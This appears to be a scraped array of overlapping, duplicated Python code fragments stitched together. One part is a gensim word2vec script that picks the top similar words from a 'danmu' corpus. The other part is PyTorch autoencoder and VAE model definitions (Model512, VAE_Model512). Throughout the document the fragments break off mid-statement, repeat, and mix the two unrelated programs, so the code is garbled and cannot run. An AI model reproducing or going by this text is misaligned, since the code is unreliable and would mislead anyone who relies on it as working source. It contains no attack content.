re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word)", "the file by line with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line)", "wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for", "vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate", "enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1", "from gensim.models import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead =", "idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else:", "fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model", "if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except:", "open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector", "line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin',", "itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line with", "\"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word):", "re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word,", "+= 1 except: pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]]", "fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict", "the most frequent topic word set wordFreq = {} for i in range(len(fileTrainRead)):", "in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word", "not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords):", "topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] =", "in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] +=", "set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate the", "filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line with open(filePath)", "for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word in enumerate(top10Words): print (word[0])", "range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word =", "#load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each", "{} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in", "import word2vec from gensim.models import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt'", "frequent topic word set wordFreq = {} for i in range(len(fileTrainRead)): words =", "re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord", "python3 import re from gensim.models import word2vec from gensim.models import KeyedVectors from operator", "set wordFreq = {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for", "re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\",", "1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for k in", "gensim.models import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = []", "similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not in", "as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set", "= re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords =", "model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]]", "model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate the most", "= 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for k", "for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in enumerate(words):", "[] #read the file by line with open(filePath) as fileTrainRaw: for line in", "with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec", "word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then", "= {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word", "then calculate the most frequent topic word set wordFreq = {} for i", "gensim.models import word2vec from gensim.models import KeyedVectors from operator import itemgetter filePath =", "line with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained", "1 except: pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for", "else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for k in sorted(wordFreq.items(),", "KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate the most frequent topic", "enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word =", "most frequent topic word set wordFreq = {} for i in range(len(fileTrainRead)): words", "for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word =", ") for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word", "# word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10)", "in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word", "from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file", "#read the file by line with open(filePath) as fileTrainRaw: for line in fileTrainRaw:", "by line with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load the", "in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words =", "in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True)", "each word and then calculate the most frequent topic word set wordFreq =", "re from gensim.models import word2vec from gensim.models import KeyedVectors from operator import itemgetter", "fileTrainRead.append(line) #load the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for", "word and then calculate the most frequent topic word set wordFreq = {}", "if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in", "the pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word", "and then calculate the most frequent topic word set wordFreq = {} for", "words = fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"),", "= KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and then calculate the most frequent", "import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line", "word2vec from gensim.models import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead", "'/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line with open(filePath) as fileTrainRaw:", "= '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by line with open(filePath) as", "for each word and then calculate the most frequent topic word set wordFreq", "similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]]", "wordFreq = {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j,", "[k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word in enumerate(top10Words): print", "for idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1", "= fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word)", "= model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not in wordFreq:" ]
[ "state size. (nef*16) x 16 x 16 nn.Conv2d(nef * 16, nef * 32,", "* 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1,", "import torch.nn as nn from torch.autograd import Variable from Param import nc, nz,", "32 nn.Conv2d(nef*8, nef * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2,", "* 4), nn.ReLU(True)) # state size. (ngf*4) x 64 x 64 self.conv_layer128 =", "nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32),", "nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf * 32, 4,", "nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part", "16, nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True),", "self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input): x = self.encode(input) x = self.decode3(x)", "4 nn.Conv2d(nef * 64, nef * 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef *", "0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1,", "1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc) x 512", "VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode =", "state size is (nef) x 256 x 256 nn.Conv2d(nef, nef * 2, 4,", "2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1,", "# state size. (ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1,", "= nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def reparametrize(self, mu, logvar): std =", "x 64 x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2,", "def forward(self, input): b_size = input.shape[0] x = self.encode(input).view(b_size, nz) mu = self.fc1(x)", "## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf", "self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( # input is (nc)", "bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8) x 32 x 32", "out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512 \"\"\" VAE with", "x = self.encode(input) x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256", "2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. (ngf*4) x 64", "1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf *", "x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),", "* 4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True),", "2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size. (ngf*2)", "out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return", "nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state", "nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), #", "nn.Sigmoid() ) ## ##### ## Decoder Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf", "nn.Linear(64, nz) def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps", "# size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf * 64, 4, 2,", "state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf * 8, 4,", "nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state", "x 64 nn.Conv2d(nef * 4, nef * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "= Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0] x = self.encode(input).view(b_size,", "size. (ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh()", "32, nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True),", "x16 nn.ConvTranspose2d(ngf * 16, ngf * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "(ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2,", "self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True),", "nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf *", "bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128,", "32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size ngf*32 x8", "self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512 \"\"\" VAE", "* 128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf *", "x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512", "128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2,", "# state size. (nef*16) x 16 x 16 nn.Conv2d(nef * 16, nef *", "64, nef * 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True),", "x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16),", "16), nn.ReLU(True), # state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf", "torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0] x", "nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4 x 4 nn.Conv2d(nef * 64,", "# for VAE # state size. (nc) x 512 x 512 ) self.output_layer", "2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x", "x4 nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "self.nz, 1, 1) #fc3 #del x x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x", "state size. (nef*32) x 8 x 8 nn.Conv2d(nef * 32, nef * 64,", "512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2", "state size. (nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def", "# state size. (ngf*2) x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf *", "x 512 x 512 nn.Conv2d(nc, nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True),", "* 16, nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2,", "(nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False),", "import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ##", "z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del x", "\"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ##", "2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3,", "1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf", "inplace=True), # state size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4,", "8 nn.Conv2d(nef * 32, nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef *", "nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), #", "4), nn.ReLU(True)) # state size. (ngf*4) x 64 x 64 self.conv_layer128 = nn.Sequential(", "nn.ReLU(True)) # state size. (ngf*2) x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf", "= nn.Tanh() #nn.Sigmoid() def forward(self, input): x = self.encode(input) x = self.decode3(x) out128", "x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2,", "nn.ConvTranspose2d(ngf * 128, ngf * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 64),", "three scales of the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz", "x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf * 8, 4, 2, 1, bias=False),", "* 4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size.", "* 2), nn.ReLU(True)) # state size. (ngf*2) x 128 x 128 self.conv_layer256 =", "= self.encode(input).view(b_size, nz) mu = self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z =", "at three scales of the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__()", "64) self.fc3 = nn.Linear(64, nz) def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps", "self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x)", "2, 1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8) x 32", "16, ngf * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), #", "class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode", "self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64) self.fc3", "(nef*4) x 64 x 64 nn.Conv2d(nef * 4, nef * 8, 4, 2,", "32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), # state size.", "logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del x x = self.decode3(z)", "nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32) x 8 x 8 nn.Conv2d(nef * 32,", "nn.ConvTranspose2d(ngf * 16, ngf * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 8),", "2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef) x 256", "x 512 nn.Conv2d(nc, nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state", "* 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size.", "#del x x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 =", "1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size. (ngf*2) x 128 x", "state size. (ngf*2) x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2,", "bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. (ngf*4) x 64 x 64", "nz, 1, 1, 0, bias=True), nn.Sigmoid() ) ## ##### ## Decoder Part ##", "nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf,", "return out128, out256, out512 \"\"\" VAE with three losses at three scales of", "state size. (nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1", "nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef) x 256 x 256 nn.Conv2d(nef,", "512 x 512 nn.Conv2d(nc, nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), #", "x 16 nn.Conv2d(nef * 16, nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode =", "self.fc3 = nn.Linear(64, nz) def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps =", "x x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x))", "nn.Conv2d(nef, nef * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True),", "x 128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4),", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3,", "128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf),", "decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part", "8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x 32 x 32 nn.Conv2d(nef*8, nef", "8), nn.ReLU(True), # state size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf * 8,", "* 16, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), # state", "bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32) x 8 x", "32), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32) x 8 x 8 nn.Conv2d(nef *", "64 x 64 nn.Conv2d(nef * 4, nef * 8, 4, 2, 1, bias=False),", "inplace=True), # state size. (nef*8) x 32 x 32 nn.Conv2d(nef*8, nef * 16,", "super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( # input", "1, 1, 0, bias=True), nn.Sigmoid() ) ## ##### ## Decoder Part ## self.decode3", "ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state", "* 4, nef * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2,", "size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf", "nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64) self.fc3 = nn.Linear(64,", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size ngf*32 x8 x8", "self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3", "* 8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size.", "2, 1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128 x2 x2", "2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode1 =", "= nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf", "(nef*16) x 16 x 16 nn.Conv2d(nef * 16, nef * 32, 4, 2,", "nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True), nn.Sigmoid() ) ## ##### ##", "64, ngf * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), #", "size. (nef*32) x 8 x 8 nn.Conv2d(nef * 32, nef * 64, 4,", "x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512,", "nn.Conv2d(nef*8, nef * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True),", "1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1,", "ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf *", "2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf,", "512 nn.Conv2d(nc, nef, 4, 2, 1, 